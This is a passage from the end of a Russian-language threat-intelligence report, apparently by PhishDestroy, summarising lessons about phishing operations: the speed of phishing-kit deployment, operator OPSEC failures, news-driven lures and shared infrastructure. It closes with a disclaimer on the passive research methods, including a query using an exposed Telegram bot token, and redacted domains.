- Автоматизация — единственный способ не отставать от времени. Фишинговые наборы развертываются и становятся орудием злоумышленников в течение нескольких часов. Ручная проверка не способна обеспечить необходимую масштабируемость.
- Операторы допускают ошибки. Файл конфигурации, оставленный без надлежащей защиты в одном из второстепенных проектов, позволил раскрыть целую международную фишинговую операцию. Обеспечить безупречную оперативную безопасность (OPSEC) во всех проектах — задача не из легких.
- Социальная инженерия развивается в такт новостному циклу. Война, гуманитарная помощь и государственные программы всё чаще используются в качестве приманок для фишинга, поскольку они нацелены на людей, оказавшихся в бедственном положении, которые реже задумываются о законности таких предложений.
- Повторное использование инфраструктуры — это норма. Один сервер, два фишинговых проекта, две страны, одни и те же операторы. Анализ связей между элементами инфраструктуры дает гораздо больше информации, чем изучение отдельного домена в изоляции.
Связанные исследования
Дополнительные результаты анализа из автоматизированной системы сбора и обработки данных PhishDestroy
Отказ от ответственности: Данное расследование проводилось исключительно с помощью пассивной разведки и общедоступных API. Несанкционированный доступ к каким-либо системам не осуществлялся. При вызове API-интерфейса бота Telegram использовался токен, который операторы открыли для общего доступа в неавторизованном конечной точке. Все доменные имена в данной статье были замазаны в соответствии со стандартной практикой в сфере информационной безопасности.
